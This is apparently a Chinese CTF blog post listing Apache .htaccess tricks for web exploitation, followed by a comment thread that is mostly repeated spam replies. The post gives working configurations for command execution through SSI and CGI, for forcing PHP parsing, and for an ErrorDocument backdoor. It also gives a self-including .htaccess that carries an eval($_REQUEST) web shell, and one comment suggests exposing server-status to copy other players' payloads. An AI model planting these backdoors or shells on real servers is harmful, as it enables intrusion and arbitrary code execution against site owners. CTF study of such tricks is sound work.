o_o ....

.htaccess

rewrite

Options +FollowSymlinks

RewriteEngine on

RewriteRule lol.jpg /flag.txt [NC]

/flag.txt相对于web路径,可以用来绕过路由限制或者当后门

SSI

.htaccess

AddType text/html .shtml
AddHandler server-parsed .shtml
Options Includes

1.shtml

<pre>
<!--#exec cmd="whoami" -->
</pre>

cgi

.htaccess

Options ExecCGI
SetHandler cgi-script

whoami.cgi(linux)

#!/bin/sh
whoami

calc.cgi(windows)

#!C:\Windows\System32\calc.exe
1

ErrorHandlerfile

同样相对web根目录, 也可以设为动态文件,比如shell.php,用来当后门

ErrorDocument 404 /flag    

handler

设置解析规则

<Files index.html>
ForceType application/x-httpd-php
SetHandler application/x-httpd-php
</Files>


自包含

访问任意php文件即可

php_value auto_prepend_fi\
le .htaccess
#<?php eval($_REQUEST['evoA'])?>

配置权限

<Files ~ "^flag.txt$">
Order deny,allow
Allow from all
</Files>
# 允许可被访问

<Files ~ "^flag.txt$">
Order allow,deny
Deny from all
</Files>
# 不可被访问

php引擎

#开启php解析
php_flag engine On
#或
php_flag engine 1

#关闭php解析
php_flag engine Off
#或
php_flag engine 0

# 貌似不能覆盖apache2.conf中 Directory指令设置的engine

不允许在.htaccess文件中出现的指令(部分)

Alias

<Directory >
</Directory>

QQ图片20201116213537.png

Comment

  1. AFKL
    Firefox 83

    整一个我常用的(bushi
    ```
    SetHandler server-status
    ```
    可以返回服务器状态
    如果不是动态靶机的话,有可能白嫖其它师傅的payload
    (好孩子不要学

    1. 1
      Chrome 92

      555

      1. 1
        Chrome 92

        555

      2. 1
        Chrome 92

        555

    2. 1
      Chrome 92

      555

      1. 1
        Chrome 92

        555

      2. 1
        Chrome 92

        555

      3. 1
        Chrome 92

        555

      4. 1
        Chrome 92

        555

      5. 1
        Chrome 92

        555

      6. 1
        Chrome 92

        555

      7. 1
        Chrome 92

        555

      8. 1
        Chrome 92

        555

      9. 1
        Chrome 92

        555

      10. 1
        Chrome 92

        555

      11. 1
        Chrome 92

        555

      12. 1
        Chrome 92

        555

      13. 1
        Chrome 92

        555

    3. 1
      Chrome 92

      555

    4. 1
      Chrome 92

      555

    5. 1
      Chrome 92

      555

    6. 1
      Chrome 92

      555

    7. 1
      Chrome 92

      555

    8. 1
      Chrome 92

      555

    9. 1
      Chrome 92

      555

    10. 1
      Chrome 92

      555

    11. 1
      Chrome 92

      555

    12. 1
      Chrome 92

      555

    13. 1
      Chrome 92

      555

    14. 1
      Chrome 92

      555

    15. 1
      Chrome 92

      555

    16. 1
      Chrome 92

      555

    17. 1
      Chrome 92

      555

    18. 1
      Chrome 92

      555

    19. 1
      Chrome 92

      555

    20. 1
      Chrome 92

      555

    21. 1
      Chrome 92

      555

  2. kodosan
    Chrome 87

    感谢师傅分享

    1. 1
      Chrome 92

      555

    2. 1
      Chrome 92

      555

    3. 1
      Chrome 92

      555

    4. 1
      Chrome 92

      555

    5. 1
      Chrome 92

      555

    6. 1
      Chrome 92

      555

    7. 1
      Chrome 92

      555

    8. 1
      Chrome 92

      555

    9. 1
      Chrome 92

      555

    10. 1
      Chrome 92

      555

    11. 1
      Chrome 92

      555

    12. 1
      Chrome 92

      555

    13. 1
      Chrome 92

      555

  3. kodosan
    Chrome 87

    感谢师傅分享

  4. 1
    Chrome 92

    555

  5. 1
    Chrome 92

    555

  6. 1
    Chrome 92

    555

  7. 1
    Chrome 92

    555

  8. 1
    Chrome 92

    555

  9. 1
    Chrome 92

    555

  10. 1
    Chrome 92

    555

  11. 1
    Chrome 92

    555

  12. 1
    Chrome 92

    555

  13. 1
    Chrome 92

    555

  14. 1
    Chrome 92

    555

  15. 1
    Chrome 92

    555

  16. 1
    Chrome 92

    555

  17. 1
    Chrome 92

    555

  18. 1
    Chrome 92

    555

  19. 1
    Chrome 92

    555

  20. 1
    Chrome 92

    555

  21. 1
    Chrome 92

    555

  22. 1
    Chrome 92

    555

  23. 1
    Chrome 92

    555

  24. 1
    Chrome 92

    555

  25. 1
    Chrome 92

    555

  26. 1
    Chrome 92

    555

  27. 1
    Chrome 92

    555

  28. 1
    Chrome 92

    555

  29. 1
    Chrome 92

    555

  30. 1
    Chrome 92

    555

  31. 1
    Chrome 92

    555

  32. 1
    Chrome 92

    555

  33. 1
    Chrome 92

    555

  34. 1
    Chrome 92

    555

  35. 1
    Chrome 92

    555

This is just a placeholder img.